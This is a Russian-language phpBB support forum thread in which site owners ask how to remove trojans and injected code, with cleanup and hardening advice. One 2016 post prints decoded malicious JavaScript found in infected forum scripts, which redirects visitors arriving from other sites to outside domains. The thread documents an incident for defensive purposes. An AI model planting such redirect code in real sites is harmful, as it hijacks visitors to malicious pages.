phpBB Guru - Официальная русская поддержка форума phpBB3

Добавлено: **12.05.2007 16:23**

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html

Добавлено: **20.02.2016 12:33**

Всем привет. Появилась проблема схожая с другими.

В общем делал следующие правки по темах:
http://www.phpbb-work.ru/vistraivaem-ka ... d-t14.html и Images across in attachment
Суть выстроить картинки в ряд, правки были файлов были: attachment.html, stylesheet.css, ббкоде.html
Желаемого результата не добился, залил назад файлы старые +обновил шаблоны. И тут началось интересное..

Сбоку появился белый фон, вместо привычных голубых синих "полосок"

Потом в коде обнаружил этот код, думал Гугл что то чудит, но временно убрав гугл приблуды с кода (Гугл+, аналитикс) желаемого результата не дали.
В ручную просмотрел файлы index.php и index_body.html, но ничего там подозрительного не нашел.
Где рыть? База? Хостер?

Код: Выделить всё

<iframe name="oauth2relay826583877" id="oauth2relay826583877" src="https://accounts.google.com/o/oauth2/postmessageRelay?parent=http%3A%2F%2Falpinisty.net#rpctoken=535250538&forcesecure=1" tabindex="-1" style="width: 1px; height: 1px; position: absolute; top: -100px;"></iframe> <div class="highslide-container" style="padding: 0px; border: none; margin: 0px; position: absolute; left: 0px; top: 0px; width: 100%; z-index: 1001; direction: ltr;"><a class="highslide-loading" title="Нажать для выхода" href="javascript:;" style="position: absolute; top: -9999px; opacity: 0.75; z-index: 1;">Загрузка...</a><div style="display: none;"></div><div class="highslide-viewport highslide-viewport-size" style="padding: 0px; border: none

Добавлено: **20.02.2016 18:13**

P.s. Перезалил файлы через фтп, результата не добился никакого.

Добавлено: **08.03.2016 12:19**

del. it

Добавлено: **16.04.2016 13:32**

Всем привет. Начиналось всё отлично! Взял в аренду сервер, поставил систему и давай продвигать свой форум. И попался вот такой сайт

Скрытый текст

autoprogon.com

Бесплатный прогон сайта по каталогам! Я следовал инструкции! После прогона, как и следовало ожидать, позиция сайта не изменилась. И буквально через месяц я случайно заметил что при переходе по внешним ссылкам на мой форум сразу перекидывает на другую страницу. И адрес этой страницы постоянно меняется.

Скрытый текст

clikunder.ru

Установил чистый форум, поменял пароли! Помогло! И вот недавно опять вылезла эта дрянь!
Я давай копать глубже! Скачиваю копию форума на комп и давай рыть. Сканировал антивирем чисто. Давай смотреть по дате последнего изменения и вот ЕВРИКА! Нашел! Были заражены все скрипты вот пример одного из кодов

код

После расшифровки получил такую картину

Код 2

(function () {
function c(x) {
if (x.substr(0, 8) == 'https://')
x = x.substr(8);
if (x.substr(0, 7) == 'http://')
x = x.substr(7);
if (x.substr(0, 4) == 'www.')
x = x.substr(4);
if (x.indexOf('/') != -1)
x = x.split('/')[0];
if (x.indexOf('?') != -1)
x = x.split('?')[0];
return x
}
var host = c(window.location.hostname),
ref = c(document.referrer),
co = document.cookie,
ident = '_y_m_=off',
D = new Date();
D.setDate(D.getDate() + 20);
document.cookie = ident + ';path=/;expires=' + D;
if (ref != '' && ref != host && co.indexOf(ident) == -1) {
setInterval(function () {
window.location.href = 'http://qb0.ru/1B'
}, 2000)
}
}
());
(function () {
function c(x) {
if (x.substr(0, 8) == 'https://')
x = x.substr(8);
if (x.substr(0, 7) == 'http://')
x = x.substr(7);
if (x.substr(0, 4) == 'www.')
x = x.substr(4);
if (x.indexOf('/') != -1)
x = x.split('/')[0];
if (x.indexOf('?') != -1)
x = x.split('?')[0];
return x
}
var host = c(window.location.hostname),
ref = c(document.referrer),
co = document.cookie,
ident = '_y_m_=off',
D = new Date();
D.setDate(D.getDate() + 20);
document.cookie = ident + ';path=/;expires=' + D;
if (ref != '' && ref != host && co.indexOf(ident) == -1) {
setInterval(function () {
window.location.href = 'http://02o.org/1a'
}, 2000)
}
}
());

Удалил вредоносный код во всех файлах и заработало но не на долго.
Следующий его ход(хакера) был сделан в сторону мода Advanced BBCode Box. Удалил мод и почистил базу с помощью STK.
Дальнейшие мои были действия это установил права на файлы и папки(запретил запись), отключил галерею и загрузку аватар из админки а на папки поставил права только чтение(было предположение что оттуда запускался шел), поменял снова пароли на все(форум, БД, админка на сервере, ФТП ), на файл config.php выставил права 400.
Пока всё чисто! тьфу.. тьфу..

Какие еще варианты или способы есть обезопасить себя от хакеров? И как его наказать или вычислить?

Добавлено: **16.04.2016 16:26**

Запретите сохранение паролей в программе, через которую вы заходите на FTP.

Отправлено спустя 1 минуту 30 секунд:

hsabarab писал(а): Бесплатный прогон сайта по каталогам!

А вот этого не нужно было делать. От этого только минус.

Добавлено: **16.04.2016 18:24**

Спасибо. Уже сделал.

Добавлено: **27.10.2018 17:12**

что за фигня, переодически всплывает окно такое в касперском фри
как оказалось IP это мой форум ))

Добавлено: **27.10.2018 19:33**

Gubkinмой антивирус ( g-data) ни как не реагирует на твой форум.
Хотя по по проверке сайтов весьма вредный

Добавлено: **28.10.2018 3:57**

проверил свой комп на вирусы, dr.web cureit нашел модифицированный hosts
восстановил
пока таких сообщений не вижу )

Добавлено: **28.10.2018 4:08**

hosts тут врядли виноват. У меня тоже модифицирован, но не трояном, а лично мной. Что это у вас там за src.js?

Отправлено спустя 2 минуты 24 секунды:
Яндекс с Гуглем не нашли на вашем форуме вирусов при последней проверке. Яндекс лишь написал, что у вас клей с www.

Добавлено: **28.10.2018 4:49**

apollion писал(а): ↑28.10.2018 4:11 Что это у вас там за src.js?

нет такого файла на форуме
не понимаю что там браузер пытается открыть

Добавлено: **28.10.2018 5:45**

Ну, для самоуспокоения вы можете:
- проверить файлы форума на вирусы онлайн - была ссылка на сервис, но я не найду
- проверить Айболитом

Кстати, если у вас выделенный айпишник форума - добавление записи в hosts ускорит загрузку форума в браузере. Но это необязательно.

Добавлено: **25.03.2019 10:23**

phpMussel - никто не пробовал что за зверь и есть ли успехи по сравнению например с ai-bolit?

Добавлено: **29.08.2019 12:04**

Версия phpbb 3.1.12. Стала возникать реклама на весь экран! Через где то 20 переходов на страницы форума. Похоже что зацепился какой то вирус или троян. Проверка на вирусы ничего не дало. Беглый просмотр времени изменения файлов на сервере не показал наличия изменений. Подскажите что ещё можно сделать?

Отправлено спустя 11 минут 53 секунды:
Реклама вылетает при любом переходе по ссылке на форуме (при серфинге по форуму).
Да ещё.. При этом при переходи со страницы на страницу стал моргать экран со сменой кодировки. Происходит это быстро и не сразу на это обращаешь внимание. Я записал видео и вырезал нужный кадр. Выглядит это примерно так:

смена кодировки.jpg

Добавлено: **29.08.2019 13:55**

Zemius, это не вирус, а кривой css, который возвращает сервер или закешировался в браузере (более вероятно, т.к. для гостя показывает все нормально)

phpBB Guru - Официальная русская поддержка форума phpBB3

Как убить Трояна?

Как убить Трояна?

Re: Как убить Трояна?

Re: Как убить Трояна?

Re: Как убить Трояна?

Re: Как убить Трояна?

Re: Как убить Трояна?

Re: Как убить Трояна?

Re: Как убить Трояна?

Re: Как убить Трояна?

Re: Как убить Трояна?

Re: Как убить Трояна?

Re: Как убить Трояна?

Re: Как убить Трояна?

Re: Как убить Трояна?

Вирус? Cтала возникать реклама на весь экран!

Re: Как убить Трояна?